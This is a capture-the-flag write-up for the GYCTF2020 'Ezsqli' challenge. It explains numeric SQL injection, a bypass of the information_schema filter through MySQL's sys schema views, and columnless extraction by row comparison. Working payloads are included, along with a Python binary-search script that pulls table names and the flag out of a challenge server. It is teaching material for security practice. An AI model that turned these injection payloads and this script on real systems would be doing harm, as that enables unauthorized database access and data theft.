GYCTF2020-Ezsqli

[GYCTF2020]Ezsqli

The id parameter is the injection point; id=4/2 behaving like id=2 shows it is a numeric injection. Testing it:

(screenshot image-20210504093103645)

The word information is filtered, so this filter has to be bypassed.

Bypassing information_schema

A chat about bypassing information_schema

MySQL injection: bypassing the information_schema filter

Alternatives to information_schema

sys.schema_table_statistics_with_buffer

SELECT * from sys.schema_table_statistics_with_buffer

table_schema, table_name, rows_fetched, fetch_latency, rows_inserted, insert_latency, rows_updated, update_latency, rows_deleted, delete_latency, io_read_requests, io_read, io_read_latency, io_write_requests, io_write, io_write_latency, io_misc_requests, io_misc_latency, innodb_buffer_allocated, innodb_buffer_data, innodb_buffer_free, innodb_buffer_pages, innodb_buffer_pages_hashed, innodb_buffer_pages_old, innodb_buffer_rows_cached

The view has table_schema and table_name columns, which can be used to get the table names:

(screenshot image-20210504101705740)

But we do not have the column names, so this needs

Columnless injection

https://www.jianshu.com/p/4a084ea1c7d4

https://zhuanlan.zhihu.com/p/98206699

This uses how SQL compares strings: when two strings are compared, their first characters are compared first; if those are equal, the second characters are compared, and so on.

id=2||((select 1,"g")>(select * from f1ag_1s_h3r3_hhhhh))#

The number of columns returned on both sides of the comparison must be the same.

With the logic sorted out, write a script using binary search:

```python
# coding=utf-8
import requests
import time

flag = ""
url = "http://bec2be36-f01b-4b15-bc93-dc44e0b9fbb6.node3.buuoj.cn/"

# database name
data1 = ""
# table names (via sys.schema_table_statistics_with_buffer instead of information_schema)
data2 = "2||ascii(substr((select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),{},1))>={}#"
# column names
data3 = ""
# data
data4 = ""
# string comparison + columnless injection
data5 = "2||((select 1,'{}')<=(select * from f1ag_1s_h3r3_hhhhh))#"
# choose which POST payload to use
data = data5

for pos in range(1, 200):
    l = 32
    r = 127
    # binary search for the largest character that still satisfies the condition
    while r > l:
        mid = int((l + r + 1) / 2)
        x = str(pos)
        y = str(mid)
        if data != data5:
            pay = {
                "id": data.format(x, y)
            }
        else:
            pay = {
                "id": data.format(flag + chr(int(y)))
            }
        # print(pay)
        # change the injection point here if needed
        response = requests.post(url=url, data=pay)
        # print(response.text)
        if "Nu1L" in response.text:
            l = mid
        else:
            r = mid - 1
        # time.sleep(0.03)
    flag += chr(int(r))
    print(chr(int(r)))
    print(flag)
print(flag)
```

I put together a POST harness; not sure how well it works...

(screenshot image-20210504112734844)

Convert to lowercase to get the flag...

flag{333ed6af-c961-438b-91fd-c578e87536a6}
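To see why the comparison oracle above works, why the search needs a stop rule, and why the result comes back in the wrong case, here is an added offline simulation (not code from the original post). It assumes the flag row is (id=1, flag), as the `select 1,'...'` probe implies, and a MySQL-style case-insensitive PAD SPACE collation such as utf8_general_ci, whose sort weights for letters are the uppercase forms; the secret row is constructed.

```python
# Added example: simulate the (select 1,'probe') <= (select * from t) oracle
# locally. Assumed: id column is 1; flag column uses a case-insensitive,
# PAD SPACE collation weighted on uppercase letters (utf8_general_ci style).

SECRET_ROW = (1, "flag{Ab3}")   # constructed sample row, not the real flag

def ci_key(s: str) -> str:
    """Collation key: trailing spaces are ignored, letters weigh as uppercase."""
    return s.rstrip(" ").upper()

def row_le(probe: tuple, row: tuple) -> bool:
    """Row comparison: column by column, stop at the first column that differs."""
    for a, b in zip(probe, row):
        if isinstance(a, str):
            a, b = ci_key(a), ci_key(b)
        if a != b:
            return a < b
    return True                        # every column equal

def oracle(guess: str, row: tuple = SECRET_ROW) -> bool:
    """Stands in for 'Nu1L' in response.text: True when the condition holds."""
    return row_le((1, guess), row)

def extract(row: tuple = SECRET_ROW, max_len: int = 64) -> str:
    """Per-character binary search over printable ASCII, as in the writeup's
    script, plus a stop rule it lacks: under PAD SPACE a trailing space compares
    equal to the end of the value, so converging on ' ' means we are done."""
    found = ""
    for _ in range(max_len):
        lo, hi = 32, 126
        while hi > lo:
            mid = (lo + hi + 1) // 2
            if oracle(found + chr(mid), row):
                lo = mid               # chr(mid) still sorts <= the true char
            else:
                hi = mid - 1
        if lo == 32:                   # only the padding space remained: end
            break
        found += chr(lo)
    return found

if __name__ == "__main__":
    got = extract()
    # 'a'..'z' and 'A'..'Z' share one weight, so the search may stop on either
    # case; that is why the writeup lowercases the result at the end.
    print(got, "->", got.lower())
```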

Author

inanb

Published on

2021-05-04

Updated on

2021-08-23

License
